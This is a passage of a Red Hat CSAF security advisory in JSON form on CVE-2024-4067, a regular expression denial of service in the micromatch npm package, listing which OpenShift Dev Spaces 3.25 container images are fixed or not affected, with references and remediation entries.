"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e381c47978265d9db3daf279657a63cfe8f1f5afe0d00d4792b819cbae480338_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:fdbae1704685d51d583b0c2e588ddf3b088b78cc84b239821421042c0943c098_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:969198cbaa319f55733ae4fb378b867f8afb9d1bfe78dfce65b20fd7ac9fb541_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:a1ccad11e91784e0b6ed9eb1745d86c8783f1e869096a7f735f47280df0acc4e_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:b2c13795589df33fec7a6c6b5ed37e11db14f134bfcc7ee0350e3df372f5da88_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:e6f11881adb8f1675e5e3372339e648d99084d7d3f244d0de1eeebc96ed08dfc_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:6137931395a4cbfa07e5579172ed579babd14a2d1e054238298eee1aee4e2c07_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:804b00736484cc574e738130b9dc0e553828f54705fed29dbd9bb873bc5d1baa_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:8cf6cd46eef5fea2e500e14b18a8ec545b5bec93e6fb2289a9d760d56e4b52bb_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:d17a2f913e7cef538d6537d0ad32e257e2d51c871fc66183ea291024e8e2afae_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:74b83b79cba88af0545e7fb52dd70df2c1b96cf23b8963517fc779fbfe3e9aac_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:46948834924666487d7f47ac11bed7655e936fdb7071ee32d1ae3b1bb1a69aa4_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:690264c2631bd5a2341b37c1d3099a84e9bfb5eb2afab2937c0453a2475d0111_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a4417f71e76b15d9c4f1c4657b2e5f2bb3979d498b362b42d9b207e37bf505d5_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:c7871f233d3908f052954b132aa6c7b57c500e41899f02ac023098e2283380c5_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:70d4bfd4a877934fbdded33e39c349b3554bc371492ee2696260916b0119efcf_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:859b5a54204008d575e774ca4794c346c0195750b5617ae56dccaf3dfa3d3f1b_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:bc65597fade1fd7de78ab27d9b0ba1bf5317b56949a9277e0af4b32db1aaee48_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:cfa0ae37ba69921586906f410956f9cd7d4a27652a544d3363c7d2dc92603286_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:29fa5d30eafda6658cf2c4a655e82e075b5708ddc1ff1b6d27c082f96c33a95d_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:56bed332699e952d3b4f4672420c379fa32954e77bb24aa3fec51823a0473703_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:8714c6e69cdc81f39c44a4d17dda5a4574e104eafeb6d3deb5f29b879e5f0f99_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:94a3bd9690ce19b7dcab8784e9edaf39a52085d84561659b5ea2e955d375f37e_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:296a441f00d4749301a9aee06a998f29ac64bb9c50d7e090711b33776a845f03_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:4ea445ee2670945ac2be3fe503be6f44d4ff4a953deffe9dc61fb4a8a30ae5a8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:84b61272c472cee00404abd49080bd492dbe63a72ebc9bdcef48dac74b72b455_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:cca33584e4afced97c7c3c35af261890279a540df0f2da4d263e8862e2c14c6c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:31e999abdb05d9dd572f21a91982bc8bfbb2007f1100650715c51d40f6f1f312_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:5b136fff0f0c8ff4d56fdb934eef1dd7d04ebdac13e7cb8c1e020bf370f4df84_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:8642741c5122757b5a01ee03e5a514a4d49b4048c6808b14ab5f8b7cece82d11_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:a353e11c2f965642a1107d7b764edccd0888009fc991ec066fb40e4632692ac4_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:10821feaf0ba17ef30f0403d29862004615952e289af23794e15d3354bc4f288_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:4cba254ffcbe10a9da41c2b25cdb098824d3adfc207ce02f5c71200bd41c6959_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f67c1d7d8549587c1032404411b01472f71e775a7bbfd91927060c1b09a631c0_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fb455374d650d93bbc4eca5616d041067cf1bcebc0dd6d0a92d8af16e2656708_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:3a3da41883a104931b483ce6f5ff089a7fe3fa7b409a0b66ec1d8d396903f246_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:5898927ebcb955afdf51695a028b2e3fe4dfb08fb12d3e4daa75d1266562bdf9_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:eec12e74a1bf7348f827b6c49d97f8cf9d27199ce2d35330f92ae3330020785f_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:f7dbf103ed9452b48a61505498c8aa1e4f445e9bf40b62769fb16372597982d2_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:3e6de411cafc0aee65b36541803bebc84070ff69bab6f3f4691d65074fe36307_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:44c8d3d034803b0f8307b56cafdfcf8083071e407139e701456acfb2e434b0c8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:821f997cae0acae9048347c648c4f762a870b6548b8b7d14129315bf85b97276_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9ebbe3422e8100ef6e9c8ca7896ca21227ae4c708f3d3321fa2ca1c8eb9f051_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:53eb58d4a5f32aa71bb7e0d3beedca005b0b68f1fa9f18e07d08e243a803a565_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:63833e84093a729b0624238325e783fbcb1e22a7649dc1b59998bcce6ac450ef_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:a63f6e4ee48aaf257c592844674621110d1380f51d53d5bbf796b3bcafb67b89_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:d50d87f4bbcabaa25d7b8a4c09d956d0d8eec926bd1c01fa1a506266e2056162_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:1669477977f4722f931dba2693089f59ab77b5828869ec188e0bbff4966d7605_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5411419f1400a2e1345d430df21d5b6ae9fc00d99a89549d7bf889e82a8f350b_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:782034bb77a0657bd9515feff4d7cb31e259dae24ed322e350022fd901fb5187_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b8439f99e641c9f04e10a97f9a593b3909968ebd293381af2885b2b4ca7ac3e0_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:0b5b29e3626d7796c6a7ab73296934fd13717ca217e1bd42dc2ac39b0efdbf8a_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:72e67f67750d8cdb639ab2fc274063e622075e00ceda667a89b54c6e0d8de955_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:8a19af8b03b59562335b3a3f77753944c27ecbccaeda3400d0f089a6cd8d11fa_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:ef84715a61474b7a45b0b24c0d30370f51ab93ff86b70d5d345545253e01c3ae_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2280601"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the NPM package `micromatch` where it is vulnerable to a regular expression denial of service (ReDoS). The issue occurs in `micromatch.braces()` in `index.js` because the pattern `.*` will readily match anything. By passing a malicious payload, the pattern matching will keep backtracking to the input while it doesn\u0027t find the closing bracket. As the input size increases, the consumption time will also increase until it causes the application to hang or slow down. There was a merged fix but further testing shows the issue persists. This issue should be mitigated by using a safe pattern that won\u0027t start backtracking the regular expression due to greedy matching.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "micromatch: vulnerable to Regular Expression Denial of Service",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:46811ca65f64fb6d260e3dca253947c749b6dd31ce3185f36e729ea817f454a4_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:65b5989d68b4489a7d1b915870afc49c0f977b9690ee958be7e8fedcc611087f_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:7d38a9fe7e1bf493f235c62ebaabdc1c805b94e731186b9ffa56cf581abc8f77_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:869bac1a7cc51c0a780667abd7b47f9e42f2da22e6d6a57b5a1d7ecdeddcee7c_s390x"
],
"known_not_affected": [
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0a15c7b78d69e8711f81727879c1d4bbd8c2e8547a0b5c84513ea3a42fb5f8f3_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e34005d1fc54aaf8863c5f0bf4bdd30120e65df1a61a6e775f0998e0be152582_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e381c47978265d9db3daf279657a63cfe8f1f5afe0d00d4792b819cbae480338_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:fdbae1704685d51d583b0c2e588ddf3b088b78cc84b239821421042c0943c098_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:969198cbaa319f55733ae4fb378b867f8afb9d1bfe78dfce65b20fd7ac9fb541_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:a1ccad11e91784e0b6ed9eb1745d86c8783f1e869096a7f735f47280df0acc4e_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:b2c13795589df33fec7a6c6b5ed37e11db14f134bfcc7ee0350e3df372f5da88_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:e6f11881adb8f1675e5e3372339e648d99084d7d3f244d0de1eeebc96ed08dfc_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:6137931395a4cbfa07e5579172ed579babd14a2d1e054238298eee1aee4e2c07_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:804b00736484cc574e738130b9dc0e553828f54705fed29dbd9bb873bc5d1baa_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:8cf6cd46eef5fea2e500e14b18a8ec545b5bec93e6fb2289a9d760d56e4b52bb_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:d17a2f913e7cef538d6537d0ad32e257e2d51c871fc66183ea291024e8e2afae_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:74b83b79cba88af0545e7fb52dd70df2c1b96cf23b8963517fc779fbfe3e9aac_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:46948834924666487d7f47ac11bed7655e936fdb7071ee32d1ae3b1bb1a69aa4_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:690264c2631bd5a2341b37c1d3099a84e9bfb5eb2afab2937c0453a2475d0111_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a4417f71e76b15d9c4f1c4657b2e5f2bb3979d498b362b42d9b207e37bf505d5_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:c7871f233d3908f052954b132aa6c7b57c500e41899f02ac023098e2283380c5_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:70d4bfd4a877934fbdded33e39c349b3554bc371492ee2696260916b0119efcf_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:859b5a54204008d575e774ca4794c346c0195750b5617ae56dccaf3dfa3d3f1b_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:bc65597fade1fd7de78ab27d9b0ba1bf5317b56949a9277e0af4b32db1aaee48_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:cfa0ae37ba69921586906f410956f9cd7d4a27652a544d3363c7d2dc92603286_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:29fa5d30eafda6658cf2c4a655e82e075b5708ddc1ff1b6d27c082f96c33a95d_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:56bed332699e952d3b4f4672420c379fa32954e77bb24aa3fec51823a0473703_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:8714c6e69cdc81f39c44a4d17dda5a4574e104eafeb6d3deb5f29b879e5f0f99_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:94a3bd9690ce19b7dcab8784e9edaf39a52085d84561659b5ea2e955d375f37e_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:296a441f00d4749301a9aee06a998f29ac64bb9c50d7e090711b33776a845f03_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:4ea445ee2670945ac2be3fe503be6f44d4ff4a953deffe9dc61fb4a8a30ae5a8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:84b61272c472cee00404abd49080bd492dbe63a72ebc9bdcef48dac74b72b455_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:cca33584e4afced97c7c3c35af261890279a540df0f2da4d263e8862e2c14c6c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:31e999abdb05d9dd572f21a91982bc8bfbb2007f1100650715c51d40f6f1f312_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:5b136fff0f0c8ff4d56fdb934eef1dd7d04ebdac13e7cb8c1e020bf370f4df84_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:8642741c5122757b5a01ee03e5a514a4d49b4048c6808b14ab5f8b7cece82d11_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:a353e11c2f965642a1107d7b764edccd0888009fc991ec066fb40e4632692ac4_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:10821feaf0ba17ef30f0403d29862004615952e289af23794e15d3354bc4f288_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:4cba254ffcbe10a9da41c2b25cdb098824d3adfc207ce02f5c71200bd41c6959_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f67c1d7d8549587c1032404411b01472f71e775a7bbfd91927060c1b09a631c0_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fb455374d650d93bbc4eca5616d041067cf1bcebc0dd6d0a92d8af16e2656708_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:3a3da41883a104931b483ce6f5ff089a7fe3fa7b409a0b66ec1d8d396903f246_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:5898927ebcb955afdf51695a028b2e3fe4dfb08fb12d3e4daa75d1266562bdf9_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:eec12e74a1bf7348f827b6c49d97f8cf9d27199ce2d35330f92ae3330020785f_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:f7dbf103ed9452b48a61505498c8aa1e4f445e9bf40b62769fb16372597982d2_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:3e6de411cafc0aee65b36541803bebc84070ff69bab6f3f4691d65074fe36307_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:44c8d3d034803b0f8307b56cafdfcf8083071e407139e701456acfb2e434b0c8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:821f997cae0acae9048347c648c4f762a870b6548b8b7d14129315bf85b97276_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9ebbe3422e8100ef6e9c8ca7896ca21227ae4c708f3d3321fa2ca1c8eb9f051_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:53eb58d4a5f32aa71bb7e0d3beedca005b0b68f1fa9f18e07d08e243a803a565_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:63833e84093a729b0624238325e783fbcb1e22a7649dc1b59998bcce6ac450ef_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:a63f6e4ee48aaf257c592844674621110d1380f51d53d5bbf796b3bcafb67b89_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:d50d87f4bbcabaa25d7b8a4c09d956d0d8eec926bd1c01fa1a506266e2056162_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:1669477977f4722f931dba2693089f59ab77b5828869ec188e0bbff4966d7605_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5411419f1400a2e1345d430df21d5b6ae9fc00d99a89549d7bf889e82a8f350b_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:782034bb77a0657bd9515feff4d7cb31e259dae24ed322e350022fd901fb5187_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b8439f99e641c9f04e10a97f9a593b3909968ebd293381af2885b2b4ca7ac3e0_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:0b5b29e3626d7796c6a7ab73296934fd13717ca217e1bd42dc2ac39b0efdbf8a_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:72e67f67750d8cdb639ab2fc274063e622075e00ceda667a89b54c6e0d8de955_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:8a19af8b03b59562335b3a3f77753944c27ecbccaeda3400d0f089a6cd8d11fa_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:ef84715a61474b7a45b0b24c0d30370f51ab93ff86b70d5d345545253e01c3ae_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-4067"
},
{
"category": "external",
"summary": "RHBZ#2280601",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2280601"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-4067",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4067"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-4067",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-4067"
},
{
"category": "external",
"summary": "https://devhub.checkmarx.com/cve-details/CVE-2024-4067/",
"url": "https://devhub.checkmarx.com/cve-details/CVE-2024-4067/"
},
{
"category": "external",
"summary": "https://github.com/micromatch/micromatch/blob/2c56a8604b68c1099e7bc0f807ce0865a339747a/index.js#L448",
"url": "https://github.com/micromatch/micromatch/blob/2c56a8604b68c1099e7bc0f807ce0865a339747a/index.js#L448"
},
{
"category": "external",
"summary": "https://github.com/micromatch/micromatch/issues/243",
"url": "https://github.com/micromatch/micromatch/issues/243"
},
{
"category": "external",
"summary": "https://github.com/micromatch/micromatch/pull/247",
"url": "https://github.com/micromatch/micromatch/pull/247"
}
],
"release_date": "2023-12-12T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-15T21:46:21+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:46811ca65f64fb6d260e3dca253947c749b6dd31ce3185f36e729ea817f454a4_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:65b5989d68b4489a7d1b915870afc49c0f977b9690ee958be7e8fedcc611087f_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:7d38a9fe7e1bf493f235c62ebaabdc1c805b94e731186b9ffa56cf581abc8f77_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:869bac1a7cc51c0a780667abd7b47f9e42f2da22e6d6a57b5a1d7ecdeddcee7c_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:23225"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:46811ca65f64fb6d260e3dca253947c749b6dd31ce3185f36e729ea817f454a4_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:65b5989d68b4489a7d1b915870afc49c0f977b9690ee958be7e8fedcc611087f_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:7d38a9fe7e1bf493f235c62ebaabdc1c805b94e731186b9ffa56cf581abc8f77_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:869bac1a7cc51c0a780667abd7b47f9e42f2da22e6d6a57b5a1d7ecdeddcee7c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0a15c7b78d69e8711f81727879c1d4bbd8c2e8547a0b5c84513ea3a42fb5f8f3_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e34005d1fc54aaf8863c5f0bf4bdd30120e65df1a61a6e775f0998e0be152582_ppc64le",
